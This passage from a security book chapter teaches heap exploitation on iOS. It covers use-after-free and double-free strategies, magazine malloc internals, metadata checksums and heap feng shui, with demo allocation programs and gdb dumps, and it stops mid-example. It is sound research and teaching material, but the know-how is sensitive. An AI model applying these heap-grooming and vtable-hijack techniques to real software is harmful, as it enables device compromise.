Chapter 7

Exploitation

The attack surface on iOS is similar to the one available on Mac OS X. Therefore, as far as userland exploitation is concerned, your focus should be tailored to client-side heap exploitation.

Note

We decided not to cover stack-related bugs because, albeit still present in some software, they are in general less likely to be exploitable and less frequent than heap-related issues.

This chapter starts by covering the common bug classes present in most client-side applications, and then digs into the notions you need to write a successful attack against them.

In modern application exploitation, it is vital to fully understand how the allocator used by the application works and how to control it as precisely as possible. In this chapter you learn about the iOS system allocator and the techniques you can use to control its layout.

One of the most frequently hit targets is the web browser. MobileSafari uses TCMalloc instead of the system allocator, so this chapter also dissects how it works and how to leverage its internals to improve an exploit's reliability.

Finally, a real client-side exploit, the Pwn2Own 2010 MobileSafari exploit, is analyzed to demonstrate how the techniques described in this chapter are applied in real life.

Exploiting Bug Classes

Depending on the targeted software, the types of vulnerabilities present in it vary wildly. For instance, when it comes to browsers it is very likely that the bug classes you will be dealing with are object lifetime issues, including use-after-free and double-free bugs, among others. If, instead, the target is a binary format parser (such as a PDF reader), the bug classes are most likely arithmetic issues or overflows.

This section briefly describes the strategies applied most frequently to exploit bugs belonging to the bug classes discussed earlier, so that you will be able to grasp which details of the allocator's behavior are relevant for each bug class.

Object Lifetime Vulnerabilities

Object lifetime issues, such as use-after-free and double-free bugs, are often present in software when an attacker has a lot of control (for example, through JavaScript) of the behavior of the application.

Use-after-free bugs usually exist when an object is deallocated but then used again in a code path. Such bugs tend to be present when the management of an object life span is far from obvious, which is one of the reasons why browsers are the perfect playground for them. Figure 7.1 shows the characteristics of these types of bugs.

Figure 7.1 Typical use-after-free scenario

In general, the strategy for exploiting these vulnerabilities is pretty straightforward:

1. Forcefully free the vulnerable object.

2. Replace the object with one whose content you control.

3. Trigger the usage of the object to gain code execution.

Often the easiest way for an attacker to execute code is to replace the virtual table pointer of the object with an address under his control; this way, whenever an indirect call is made, the execution can be hijacked.
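The three steps above can be sketched safely in plain C. This is only a toy model: the one-slot pool stands in for an allocator that hands freed memory out again, the function pointer stands in for a C++ virtual table pointer, and all names (Object, pool_alloc, use_after_free_demo) are hypothetical.

```c
#include <stddef.h>

/* Toy object: the function pointer stands in for a C++ vtable pointer. */
typedef struct Object {
    const char *(*describe)(void);
    char payload[24];
} Object;

/* One-slot pool standing in for an allocator that reuses freed memory. */
static Object pool_slot;
static int pool_in_use = 0;

static Object *pool_alloc(void) {
    if (pool_in_use) return NULL;
    pool_in_use = 1;
    return &pool_slot;
}

static void pool_free(Object *obj) {
    if (obj == &pool_slot) pool_in_use = 0;
}

static const char *legitimate(void) { return "legitimate"; }
static const char *hijacked(void)   { return "hijacked"; }

const char *use_after_free_demo(void) {
    Object *victim = pool_alloc();
    victim->describe = legitimate;

    pool_free(victim);                    /* 1. free the vulnerable object  */

    Object *replacement = pool_alloc();   /* 2. the same slot is reused     */
    replacement->describe = hijacked;     /*    attacker-controlled content */

    /* 3. the stale pointer is used: the indirect call goes to hijacked() */
    const char *result = victim->describe();
    pool_free(replacement);
    return result;
}
```

Calling use_after_free_demo() returns "hijacked": the stale victim pointer and the replacement refer to the same storage, so the indirect call follows whatever the replacement wrote there.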

Double-frees are vulnerabilities that happen when an object is deallocated more than once during its life span. The exploitation of double-free can come in different shapes and flavors, but most of the time it can be considered a subcase of a use-after-free bug. The first strategy for turning a double-free into a use-after-free is the following:

1. After the vulnerable object is deallocated once, replace the object with a legitimate one.

2. The newly created object is freed again as part of the double-free vulnerability.

3. Replace the newly created object with one whose content you control.

4. Trigger the usage of the object to gain code execution.

The second strategy is to inspect all the code paths taken when the vulnerable object is freed, and determine whether it is possible to hijack the execution by controlling its content with specifically crafted data. For instance, if an indirect call (either of the object itself or of a member of the object) is triggered in the object destructor, an attacker can take over the application in pretty much the same fashion used for use-after-free bugs.

It should be clear by now that you have a lot of allocation-deallocation gimmicks to learn in order to exploit these vulnerabilities. In fact, the focus with these kinds of vulnerabilities is more on the functioning of an allocator than possible weaknesses in handling memory blocks.

In the next section you see some bug classes that require more focus on the latter than the former.

Arithmetic and Overflow Vulnerabilities

These vulnerabilities usually allow an attacker to overwrite four or more bytes at more or less arbitrary locations. Whether an integer overflow occurs and allows an attacker to write past the size of a buffer, or allows the attacker to allocate a smaller-than-needed buffer, or the attacker ends up having the chance to write to a buffer that is smaller than intended, what she needs is a reliable way to control the heap layout to be able to overwrite interesting data.
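As a minimal sketch of the smaller-than-needed buffer case, consider a size computed as count * elem_size in 32-bit arithmetic. The function names here are hypothetical and the example assumes a 32-bit size type, as on the devices discussed in this chapter.

```c
#include <stdint.h>
#include <stdbool.h>

/* Unchecked: the product wraps modulo 2^32, so a huge count can yield
 * a tiny allocation size. */
uint32_t unchecked_alloc_size(uint32_t count, uint32_t elem_size) {
    return count * elem_size;
}

/* Checked: reports failure instead of returning a wrapped size. */
bool checked_alloc_size(uint32_t count, uint32_t elem_size, uint32_t *out) {
    if (elem_size != 0 && count > UINT32_MAX / elem_size)
        return false;
    *out = count * elem_size;
    return true;
}
```

With count = 0x40000001 and elem_size = 4, the unchecked version returns 4: a buffer of four bytes would be allocated while the code that fills it still believes it holds more than a billion elements.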

Especially in the past, the strategy was usually to overwrite heap metadata so that when an element of a linked list was unlinked, an attacker could overwrite an arbitrary memory location. Nowadays, it is more common to overwrite application-specific data, because the heap normally checks the consistency of its data structures. Overwriting application-specific data often requires making sure that the buffer you are overflowing sits close to the one that needs to be overwritten. Later in this chapter you learn to perform all those operations with some simple techniques that can work in most scenarios.
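The idea of overwriting application-specific data that sits right after the overflowed buffer can be illustrated with a toy layout. In this sketch the two "heap blocks" are simply members of one struct so that the overflow stays within defined behavior; Arena, is_admin, and buggy_copy are hypothetical names, not part of any real application.

```c
#include <string.h>
#include <stddef.h>

#define BUF_SIZE 32

/* Two "heap blocks" laid out back to back inside one arena. */
typedef struct {
    char buffer[BUF_SIZE];   /* vulnerable buffer                       */
    unsigned int is_admin;   /* application-specific data just after it */
} Arena;

/* Buggy copy: trusts the caller-supplied length instead of BUF_SIZE. */
void buggy_copy(Arena *arena, const void *src, size_t len) {
    if (len > sizeof(*arena))
        len = sizeof(*arena);          /* keep the demo inside the arena */
    memcpy(arena, src, len);
}
```

Copying BUF_SIZE + sizeof(unsigned int) bytes of 0x41 through buggy_copy() leaves is_admin nonzero, even though the caller only ever meant to fill buffer. On a real heap the attacker's job is to make sure the interesting object, rather than unrelated data, is the neighbor that gets hit.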

Understanding the iOS System Allocator

The iOS system allocator is called magazine malloc. To study the allocator implementation, refer to the Mac OS X allocator (whose implementation is located in magazine_malloc.c in the Libc source code for Mac OS X).

Although some research has been done on the previous version of the Mac OS X allocator, there is a general lack of information on magazine malloc exploitation. The best available research on the topic was covered by Dino Dai Zovi and Charlie Miller in The Mac Hacker's Handbook (Wiley Publishing: 978-0-470-39536-3) and in a few other white papers.

This section covers the notions you need to create an exploit for the iOS allocator.

Regions

Magazine malloc uses the concept of regions to perform allocations. Specifically, the heap is divided into three regions:

Tiny (less than 496 bytes)
Small (more than 496 but less than 15360 bytes)
Large (anything else above 15360 bytes)

Each region consists of an array of memory blocks (known as quanta) and metadata to determine which quanta are used and which ones are free. Each region differs slightly from the others based on two factors — region and quantum size:

Tiny is 1MB large and uses 16 bytes quanta.
Small is 8MB and uses 512 bytes quanta.
Large varies in size and has no quanta.
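The size classes and quanta listed above can be expressed as a small helper. This is a sketch based only on the figures quoted in this section; the treatment of requests that are exactly 496 or 15360 bytes is an assumption, and the names are hypothetical rather than taken from magazine_malloc.c.

```c
#include <stddef.h>

#define TINY_QUANTUM   16u
#define SMALL_QUANTUM  512u
#define TINY_LIMIT     496u     /* figures quoted in the text */
#define SMALL_LIMIT    15360u

typedef enum { REGION_TINY, REGION_SMALL, REGION_LARGE } region_t;

/* Pick the region for a request (boundary handling is an assumption). */
region_t classify_request(size_t size) {
    if (size < TINY_LIMIT)  return REGION_TINY;
    if (size < SMALL_LIMIT) return REGION_SMALL;
    return REGION_LARGE;
}

/* Round a request up to a whole number of quanta. */
size_t round_up_to_quantum(size_t size, size_t quantum) {
    return (size + quantum - 1) / quantum * quantum;
}
```

For example, a 24-byte request lands in the tiny region and occupies 32 bytes (two 16-byte quanta), which is consistent with the 0x20 spacing between consecutive malloc(24) blocks in the gdb output later in this chapter.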

The allocator maintains 32 freelists for tiny and small regions. The freelists from 1 to 31 are used for allocations, and the last freelist is used for blocks that are coalesced after two or more objects close to each other are freed.

The main difference between magazine malloc and the previous allocator on iOS is that magazine malloc maintains separate regions for each CPU present on the system. This allows the allocator to scale much better than the previous one. This chapter does not take this difference into account because only the new iPhone 4S and iPad 2 are dual-core; the other Apple products running iOS have only one CPU.

Allocation

When an allocation is required, magazine malloc first decides which region is the appropriate one based on the requested size. The behavior for tiny and small regions is identical, whereas for large allocations the process is slightly different. This section walks through the process for tiny and large regions, which gives a complete overview of how the allocation process works.

Every time a memory block is deallocated, magazine malloc keeps a reference to it in a dedicated structure member called mag_last_free. If a new allocation requests the same size as the block held in mag_last_free, that block is returned to the caller and mag_last_free is set to NULL.

If the size differs, magazine malloc starts looking in the freelists for the specific region for an exact size match. If this attempt is unsuccessful, the last freelist is examined; this freelist, as mentioned before, is used to store larger memory blocks that were coalesced.

If the last freelist is not empty, a memory block from there is split into two parts: one to be returned to the caller and one to be put back on the freelist itself.

If all the preceding attempts failed and no suitable memory regions are allocated, magazine malloc allocates a new memory block using mmap() and assigns it to the appropriate region type. This process is carried out by the thread whose request for allocation could not be satisfied.
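The lookup order just described for tiny and small requests can be summarized with a toy model. It is a deliberate simplification that tracks only block counts and sizes in quanta; toy_magazine and toy_alloc are hypothetical names, and the real allocator's bookkeeping is considerably more involved.

```c
typedef enum {
    FROM_LAST_FREE,    /* served from the mag_last_free cache        */
    FROM_FREELIST,     /* exact-size match on a regular freelist     */
    FROM_SPLIT,        /* carved out of a block on the last freelist */
    FROM_NEW_REGION    /* nothing suitable: a new region is mapped   */
} source_t;

typedef struct {
    unsigned last_free_quanta;    /* size of the cached block, 0 if none      */
    unsigned freelist_count[31];  /* [q-1] = free blocks of exactly q quanta  */
    unsigned big_block_quanta;    /* one coalesced block on the last freelist,
                                     0 if that list is empty                  */
} toy_magazine;

/* Serve a request of `quanta` quanta (expected range: 1..31). */
source_t toy_alloc(toy_magazine *m, unsigned quanta) {
    if (quanta != 0 && m->last_free_quanta == quanta) {
        m->last_free_quanta = 0;              /* the cache is emptied */
        return FROM_LAST_FREE;
    }
    if (quanta >= 1 && quanta <= 31 && m->freelist_count[quanta - 1] > 0) {
        m->freelist_count[quanta - 1]--;
        return FROM_FREELIST;
    }
    if (m->big_block_quanta > quanta) {
        /* Simplification: the remainder stays on the last freelist. */
        m->big_block_quanta -= quanta;
        return FROM_SPLIT;
    }
    return FROM_NEW_REGION;
}
```

The practical consequence for an exploit writer is the ordering: a block that was just freed is the first candidate for the next allocation of the same size, before any freelist is consulted.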

For large objects the process is more straightforward. Instead of maintaining 32 freelists, large objects have a cache that contains all the available entries. Therefore, the allocator first looks for already allocated memory pages of the correct size. If none can be found, it searches for bigger memory blocks and splits them so that one half can fulfill the request and the other is pushed back to the list of available ones.

Finally, if no memory regions are available, an allocation using mmap() is performed.

Deallocation

The same distinction made for allocations in terms of regions holds true for deallocations as well. As a result, deallocation is covered only for tiny memory objects and large memory objects.

When a tiny object is freed, the allocator puts it in the region cache, that is, mag_last_free.

The memory area that was previously there is moved to the appropriate freelist following three steps. First the allocator checks whether the object can be coalesced with the previous one, then it verifies if it can be coalesced with the following one. Depending on whether any of the coalescing operations were successful, the object is placed accordingly.

If the size of the object after coalescing is bigger than the appropriate sizes for the tiny region, the object is placed in the last freelist (recalling from the Allocation section, this is the freelist where objects bigger than expected for a given region are placed).

When a tiny region contains only freed blocks, the whole region is released to the system.

The procedure is slightly different for large objects. If the object is larger than a certain threshold, the object is released immediately to the system. Otherwise, in a similar fashion to tiny and small, the object is placed in a dedicated position called large_entry_cache_newest.

The object that was in the most recent position is moved to the large object cache if there is enough space — that is, if the number of entries in the cache doesn't exceed the maximum number of elements allowed to be placed there. The size of the cache is architecture- and OS-dependent.

If the cache exceeds the size, the object is deallocated without being placed in the cache. Likewise, if after placing the object in the cache, the cache size grows too big, the oldest object in the cache is deleted.

Taming the iOS Allocator

In this section you walk through a number of examples that allow you to better understand the internals of the allocator and how to use it for your own purposes in the context of exploitation.

Most often you will work directly on the device. The main reason for this choice is that magazine malloc keeps per-CPU caches of tiny and small regions; therefore, the behavior on an Intel machine might be too imprecise compared to the iPhone. Nonetheless, when debugging real-world exploits it might be desirable to work from a virtual machine running Mac OS X, which is as close as possible to an iPhone in terms of available RAM and number of CPUs. Another viable and easier option is to use a jailbroken phone; this grants access to gdb and a number of other tools.

Tools of the Trade

A number of tools exist to assist in debugging heap-related issues on Mac OS X; unfortunately, only a small percentage of those are available on non-jailbroken iPhones.

This section talks about all the available tools both on OS X and iOS, specifying which ones are available on both platforms and which are available only on OS X.

A number of environment variables exist to ease the task of debugging. The most important ones are listed here:

MallocScribble—Fills freed memory with 0x55
MallocPreScribble—Fills uninitialized memory with 0xAA
MallocStackLogging—Records the full history and stack logging of a memory block (the results can be inspected using malloc_history)

These environment variables can be used both on Mac OS X and iOS.

Another tool useful for determining the types of bugs you are dealing with is crashwrangler. When an application crashes, it reports the reason for the crash and whether or not it appears to be exploitable. In general, crashwrangler is not very good at predicting exploitability, but understanding why the application crashed can still be quite useful.

Finally, you can use Dtrace to inspect allocations and deallocations of memory blocks on the system allocator. The Mac Hacker's Handbook shows a number of Dtrace scripts that can be handy for debugging purposes.

Both Dtrace and crashwrangler are available only for Mac OS X.

Learning Alloc/Dealloc Basics

Note

Find code for this chapter at our book's website at www.wiley.com/go/ioshackershandbook.

One of the easiest ways to exploit an arithmetic bug in the past was to overwrite heap-metadata information. This is not possible anymore with magazine malloc. Every time an object is deallocated, its integrity is verified by the following function:

static INLINE void *
free_list_unchecksum_ptr(szone_t *szone, ptr_union *ptr)
{
    ptr_union p;
    uintptr_t t = ptr->u;

    t = (t << NYBBLE) | (t >> ANTI_NYBBLE); // compiles to rotate instruction
    p.u = t & ~(uintptr_t)0xF;

    if ((t & (uintptr_t)0xF) != free_list_gen_checksum(p.u ^ szone->cookie))
    {
      free_list_checksum_botch(szone, (free_list_t *)ptr);
      return NULL;
    }
    return p.p;
}

Specifically, when an object is deallocated, the previous and next pointers of its heap metadata are verified: each pointer is XORed with a randomly generated cookie, a four-bit checksum of the result is computed, and that checksum is compared with the one stored in the high four bits of the pointer.
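To make the scheme concrete, here is a minimal 32-bit sketch of both directions: storing a checksummed pointer and verifying it. The verification mirrors the function shown above; the checksum routine (a sum of the pointer's bytes truncated to four bits) and the encoding routine are assumptions modeled on the Libc source, and the cookie value used in any test is arbitrary.

```c
#include <stdint.h>
#include <stdbool.h>

#define NYBBLE      4
#define ANTI_NYBBLE 28   /* 32-bit pointers */

/* Assumed checksum: sum of the four bytes, truncated to four bits. */
static uint32_t gen_checksum(uint32_t v) {
    uint8_t chk = (uint8_t)((v) + (v >> 8) + (v >> 16) + (v >> 24));
    return chk & 0xFu;
}

/* Store form: pointer shifted right by a nybble (blocks are 16-byte
 * aligned, so no information is lost), checksum in the top four bits. */
uint32_t checksum_ptr(uint32_t ptr, uint32_t cookie) {
    return (ptr >> NYBBLE) | (gen_checksum(ptr ^ cookie) << ANTI_NYBBLE);
}

/* Verify form: rotate left by a nybble, split pointer and checksum,
 * and recompute the checksum with the cookie. */
bool unchecksum_ptr(uint32_t stored, uint32_t cookie, uint32_t *out) {
    uint32_t t = (stored << NYBBLE) | (stored >> ANTI_NYBBLE);
    uint32_t p = t & ~(uint32_t)0xF;
    if ((t & 0xFu) != gen_checksum(p ^ cookie))
        return false;              /* the real code aborts the process here */
    *out = p;
    return true;
}
```

A pointer that round-trips through checksum_ptr() and unchecksum_ptr() with the same cookie comes back unchanged, whereas flipping a bit in the stored pointer makes verification fail in this example. With only four bits of checksum, an attacker who cannot read the cookie still has roughly a one in sixteen chance per pointer of guessing correctly, which is far too unreliable for most exploits.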

Metadata of objects allocated in the large region are not verified. Nonetheless the metadata for those objects are stored separately, and therefore classic attacks against large objects are not feasible either.

Unless an attacker is capable of reading the cookie that is used to verify heap metadata, the only option left is to overwrite application-specific data. For this reason you should try to become familiar with common operations that can be used during exploitation.

It is clear that the ability of an attacker to place memory objects close to each other in memory is pretty important to reliably overwrite application-specific data.

To understand better how to control the heap layout, start with a simple example that illustrates the way objects are allocated and freed. Run this small application on a test device running iOS:

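#import <UIKit/UIKit.h>
#import "bookAppDelegate.h"   // app delegate header (file name assumed from the class name)
#include <stdlib.h>           // malloc, free
#include <string.h>           // memset

// Software breakpoint: getpid() (syscall 20), then kill(pid, SIGINT) (syscall 37).
#define DebugBreak() \
do { \
__asm__("mov r0, #20\nmov ip, r0\nsvc 128\nmov r1, #37\nmov ip, r1\nmov r1, #2\nmov r2, #1\nsvc 128\n" \
: : : "memory","ip","r0","r1","r2"); \
} while (0)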

int main(int argc, char *argv[])
{
    unsigned long *ptr1, *ptr2, *ptr3, *ptr4;
    ptr1 = malloc(24);
    ptr2 = malloc(24);
    ptr3 = malloc(24);
    ptr4 = malloc(24);
   
    memset(ptr1, 0xaa, 24);
    memset(ptr2, 0xbb, 24);
    memset(ptr3, 0xcc, 24);
    DebugBreak();
   
    free(ptr1);
    DebugBreak();
    free(ptr3);
    DebugBreak();
    free(ptr2);
    DebugBreak();
    free(ptr4);
    DebugBreak();
   
    @autoreleasepool {
        return UIApplicationMain(argc, argv, nil, NSStringFromClass
([bookAppDelegate class]));
    }
}

The application first allocates four buffers in the tiny region and then starts to free them one by one. We use a macro to cause a software breakpoint so that Xcode will automatically break into gdb for us while running the application on the test device.

At the first breakpoint the buffers have been allocated and placed in memory:

GNU gdb 6.3.50-20050815 (Apple version gdb-1708) (Fri Aug 26 04:12:03 UTC 2011)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "--host=i386-apple-darwin
--target=arm-apple-darwin".tty /dev/ttys002
target remote-mobile /tmp/.XcodeGDBRemote-1923-40
Switching to remote-macosx protocol
mem 0x1000 0x3fffffff cache
mem 0x40000000 0xffffffff none
mem 0x00000000 0x0fff none
[Switching to process 7171 thread 0x1c03]
[Switching to process 7171 thread 0x1c03]
sharedlibrary apply-load-rules all
Current language:  auto; currently objective-c
(gdb) x/40x ptr1
0x14fa50:     0xaaaaaaaa   0xaaaaaaaa   0xaaaaaaaa   0xaaaaaaaa
0x14fa60:     0xaaaaaaaa   0xaaaaaaaa   0x00000000   0x00000000
0x14fa70:     0xbbbbbbbb   0xbbbbbbbb   0xbbbbbbbb   0xbbbbbbbb
0x14fa80:     0xbbbbbbbb   0xbbbbbbbb   0x00000000   0x00000000
0x14fa90:     0xcccccccc   0xcccccccc   0xcccccccc   0xcccccccc
0x14faa0:     0xcccccccc   0xcccccccc   0x00000000   0x00000000
0x14fab0:     0x00000000   0x00000000   0x00000000   0x00000000
0x14fac0:     0x00000000   0x00000000   0x00000000   0x00000000
0x14fad0:     0x7665442f   0x706f6c65   0x752f7265   0x6c2f7273
0x14fae0:     0x6c2f6269   0x63586269   0x4465646f   0x67756265
(gdb) c
Continuing.

Next the first object is freed:

Program received signal SIGINT, Interrupt.
main (argc=1, argv=0x2fdffbac) at /Users/snagg/Documents/Book/booktest/
booktest/main.m:34
34    free(ptr3);
(gdb) x/40x ptr1
0x14fa50:     0xaaaaaaaa   0xaaaaaaaa   0xaaaaaaaa     0xaaaaaaaa
0x14fa60:     0xaaaaaaaa   0xaaaaaaaa   0x00000000     0x00000000
0x14fa70:     0xbbbbbbbb   0xbbbbbbbb   0xbbbbbbbb     0xbbbbbbbb
0x14fa80:     0xbbbbbbbb   0xbbbbbbbb   0x00000000     0x00000000
0x14fa90:     0xcccccccc   0xcccccccc   0xcccccccc     0xcccccccc
0x14faa0:     0xcccccccc   0xcccccccc   0x00000000     0x00000000
0x14fab0:     0x00000000   0x00000000   0x00000000     0x00000000
0x14fac0:     0x00000000   0x00000000   0x00000000     0x00000000
0x14fad0:     0x7665442f   0x706f6c65   0x752f7265     0x6c2f7273
0x14fae0:     0x6c2f6269   0x63586269   0x4465646f     0x67756265
(gdb) c
Continuing.

Nothing in memory layout has changed, and this is in line with what we have explained before. In fact, at this point only ptr1 was freed and it was placed accordingly in the mag_last_free cache. Going further:

main (argc=1, argv=0x2fdffbac) at /Users/snagg/Documents/Book/booktest
/booktest/main.m:36
36         free(ptr2);
(gdb) x/40x ptr1
0x14fa50:     0x90000000   0x90000000   0xaaaa0002     0xaaaaaaaa
0x14fa60:     0xaaaaaaaa   0xaaaaaaaa   0x00000000     0x00020000
0x14fa70:     0xbbbbbbbb   0xbbbbbbbb   0xbbbbbbbb     0xbbbbbbbb
0x14fa80:     0xbbbbbbbb   0xbbbbbbbb   0x00000000     0x00000000
0x14fa90:     0xcccccccc   0xcccccccc   0xcccccccc     0xcccccccc
0x14faa0:     0xcccccccc   0xcccccccc   0x00000000     0x00000000
0x14fab0:     0x00000000   0x00000000   0x00000000     0x00000000
0x14fac0:     0x00000000   0x00000000   0x00000000     0x00000000
0x14fad0:     0x7665442f   0x706f6c65   0x752f7265     0x6c2f7273
0x14fae0:     0x6c2f6269   0x63586269   0x4465646f     0x67756265
(gdb) c
Continuing.

Now ptr3 was freed as well; therefore, ptr1 had to be taken off the mag_last_free cache and was actually placed on the freelist. The first two dwords represent the previous and the next pointer in the freelist. Remembering that pointers are XORed with a randomly generated cookie, you can easily gather that both of them are NULL; in fact, the freelist was previously empty. The next object to be freed is ptr2:

Program received signal SIGINT, Interrupt.
main (argc=1, argv=0x2fdffbac) at /Users/snagg/Documents/Book/booktest
/booktest/main.m:38
38        free(ptr4);
(gdb) x/40x ptr1
0x14fa50:     0x70014fa9   0x90000000   0xaaaa0002   0xaaaaaaaa
0x14fa60:     0xaaaaaaaa   0xaaaaaaaa   0x00000000   0x00020000
0x14fa70:     0xbbbbbbbb   0xbbbbbbbb   0xbbbbbbbb   0xbbbbbbbb
0x14fa80:     0xbbbbbbbb   0xbbbbbbbb   0x00000000   0x00000000
0x14fa90:     0x90000000   0x70014fa5   0xcccc0002   0xcccccccc
0x14faa0:     0xcccccccc   0xcccccccc   0x00000000   0x00020000
0x14fab0:     0x00000000   0x00000000   0x00000000   0x00000000
0x14fac0:     0x00000000   0x00000000   0x00000000   0x00000000
0x14fad0:     0x7665442f   0x706f6c65   0x752f7265   0x6c2f7273
0x14fae0:     0x6c2f6269   0x63586269   0x4465646f   0x67756265
(gdb) c
Continuing.

Things have changed slightly. Now ptr2 is in the mag_last_free cache and both ptr1 and ptr3 are on the freelist. Moreover, the previous pointer for ptr1 now points to ptr3, whereas the next pointer for ptr3 points to ptr1. Finally, see what happens when ptr4 is placed in the mag_last_free cache:
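The stored freelist pointers in the dump can be decoded by hand with the same rotation used in free_list_unchecksum_ptr. The helpers below are a small sketch for 32-bit values; their names are hypothetical, and they only split a stored dword into address and checksum without verifying the checksum, because that would require the cookie.

```c
#include <stdint.h>

/* Recover the address from a stored freelist pointer:
 * rotate left by four bits and drop the checksum nybble. */
uint32_t freelist_ptr_address(uint32_t stored) {
    uint32_t t = (stored << 4) | (stored >> 28);
    return t & ~(uint32_t)0xF;
}

/* The checksum lives in the top four bits of the stored value. */
uint32_t freelist_ptr_checksum(uint32_t stored) {
    return stored >> 28;
}
```

Applied to the output above, 0x70014fa9 (first dword of ptr1) decodes to 0x0014fa90, the address of ptr3, and 0x70014fa5 (second dword of ptr3) decodes to 0x0014fa50, the address of ptr1. The value 0x90000000 decodes to address 0 with checksum 9, that is, a NULL pointer.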

Program received signal SIGINT, Interrupt.
0x00002400 in main (argc=1, argv=0x2fdffbac) at
/Users/snagg/Documents/Book/booktest/booktest/main.m:39
39     DebugBreak();
(gdb) x/40x ptr1
0x14fa50:     0x90000000   0x90000000   0xaaaa0006   0xaaaaaaaa
0x14fa60:     0xaaaaaaaa   0xaaaaaaaa   0x00000000   0x00020000
0x14fa70:     0xbbbbbbbb   0xbbbbbbbb   0xbbbbbbbb   0xbbbbbbbb
0x14fa80:     0xbbbbbbbb   0xbbbbbbbb   0x00000000   0x00000000
0x14fa90:     0x90000000   0x90000000   0xcccc0002   0xcccccccc
0x14faa0:     0xcccccccc   0xcccccccc   0x00000000   0x00060000
0x14fab0:     0x00000000   0x00000000   0x00000000   0x00000000
0x14fac0:     0x00000000   0x00000000   0x00000000   0x00000000
0x14fad0:     0x7665442f   0x706f6c65   0x752f7265   0x6c2f7273
0x14fae0:     0x6c2f6269   0x63586269   0x4465646f   0x67756265
(gdb)

The content of ptr2 seems unchanged, but other things are different. First, both the previous and next pointers for ptr1 and ptr3 are set to NULL, and the size of the ptr1 block has changed. ptr1 is now 96 bytes long (0x0006 * 16 bytes, 16 bytes being the quantum size for the tiny region). This means that ptr1, ptr2, and ptr3 were all coalesced into one block that was placed on the freelist for a different size (0x0006 quanta), which has no other elements. Therefore, both its previous and next pointers are NULL. The freelist for 0x0002 is now empty.
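The whole sequence observed in gdb can be reproduced with a toy model of the one-entry cache plus coalescing. This is a sketch under simplifying assumptions: blocks are tracked by their starting quantum in a small array, freelists themselves are not modeled, and toy_heap, toy_init, and toy_free are hypothetical names.

```c
#define NQ 16                       /* quanta in the toy heap */
enum { USED, CACHED, FREE };

typedef struct {
    int state[NQ];   /* state of the block starting at this quantum   */
    int len[NQ];     /* block length in quanta, 0 if no block starts  */
    int last_free;   /* start of the block in the cache, -1 if empty  */
} toy_heap;

/* Lay out nblocks used blocks of quanta_each quanta, back to back. */
void toy_init(toy_heap *h, int nblocks, int quanta_each) {
    int i;
    for (i = 0; i < NQ; i++) { h->state[i] = USED; h->len[i] = 0; }
    for (i = 0; i < nblocks; i++) h->len[i * quanta_each] = quanta_each;
    h->last_free = -1;
}

/* Move block b out of the cache, coalescing with free neighbors. */
static void release(toy_heap *h, int b) {
    int p, n;
    h->state[b] = FREE;
    for (p = 0; p < b; p++) {               /* previous block free? */
        if (h->len[p] > 0 && p + h->len[p] == b && h->state[p] == FREE) {
            h->len[p] += h->len[b];
            h->len[b] = 0;
            b = p;
            break;
        }
    }
    n = b + h->len[b];                      /* following block free? */
    if (n < NQ && h->len[n] > 0 && h->state[n] == FREE) {
        h->len[b] += h->len[n];
        h->len[n] = 0;
    }
}

/* free(): the block goes into the cache; the previous occupant of the
 * cache is the one that actually reaches the freelists. */
void toy_free(toy_heap *h, int b) {
    int prev = h->last_free;
    h->state[b] = CACHED;
    h->last_free = b;
    if (prev >= 0) release(h, prev);
}
```

After toy_init(&h, 4, 2), freeing the blocks at quanta 0, 4, 2, and 6 in that order (mirroring ptr1, ptr3, ptr2, and ptr4) leaves one free block of 6 quanta at offset 0 and the last block in the cache, matching the 0x0006 size seen in the final dump.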

Exploiting Arithmetic Vulnerabilities

The previous example dispelled once and for all the idea of being able to overwrite heap metadata to achieve code execution. Therefore, the only available option is to allocate objects in a way that allows the vulnerable object to be placed next to the one to overwrite. This technique is called Heap Feng Shui. Later in this chapter, you learn its basics and use it in the context of a browser. For now, you will limit yourself to a simple plan:

1. Allocate a bunch of vulnerable objects.

2. Create holes in between them.

3. Allocate “interesting” objects in the holes.

To accomplish this goal you can use the following simple application. It first allocates 50 objects and sets their content to 0xcc. Then half of them will be freed, and finally 10 objects filled with 0xaa will be allocated:

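#import <UIKit/UIKit.h>
#import "bookAppDelegate.h"   // app delegate header (file name assumed from the class name)
#include <stdlib.h>           // malloc, free
#include <string.h>           // memset

// Software breakpoint: getpid() (syscall 20), then kill(pid, SIGINT) (syscall 37).
#define DebugBreak() \
do { \
__asm__("mov r0, #20\nmov ip, r0\nsvc 128\nmov r1, #37\nmov ip, r1\nmov r1, #2\nmov r2, #1\nsvc 128\n" \
: : : "memory","ip","r0","r1","r2"); \
} while (0)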

int main(int argc, char *argv[])
{
    unsigned long *buggy[50];
    unsigned long *interesting[10];
    int i;
   
    for(i = 0; i < 50; i++) {
        buggy[i] = malloc(48);
        memset(buggy[i], 0xcc, 48);
    }
    DebugBreak();
   
    for(i = 49; i > 0; i -=2)
        free(buggy[i]);
   
    DebugBreak();
   
    for(i = 0; i < 10; i++) {
        interesting[i] = malloc(48);
        memset(interesting[i], 0xaa, 48);
    }
   
    DebugBreak();
   
    @autoreleasepool {
        return UIApplicationMain(argc, argv, nil, NSStringFromClass
([bookAppDelegate class]));
    }
}

You start by running the application:

GNU gdb 6.3.50-20050815 (Apple version gdb-1708) (Fri Aug 26 04:12:03 UTC 2011)
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "--host=i386-apple-darwin
--target=arm-apple-darwin".tty /dev/ttys002
target remote-mobile /tmp/.XcodeGDBRemote-1923-73
Switching to remote-macosx protocol
mem 0x1000 0x3fffffff cache
mem 0x40000000 0xffffffff none
mem 0x00000000 0x0fff none
[Switching to process 7171 thread 0x1c03]
[Switching to process 7171 thread 0x1c03]
sharedlibrary apply-load-rules all
Current language:  auto; currently objective-c
(gdb) x/50x buggy
0x2fdffacc:   0x0017ca50   0x0017ca80   0x0017cab0   0x0017cae0
0x2fdffadc:   0x0017cb10   0x0017cb40   0x0017cb70   0x0017cba0
0x2fdffaec:   0x0017cbd0   0x0017cc00   0x0017cc30   0x0017cc60
0x2fdffafc:   0x0017cc90   0x0017ccc0   0x0017ccf0   0x0017cd20
0x2fdffb0c:   0x0017cd50   0x0017cd80   0x0017cdb0   0x0017cde0
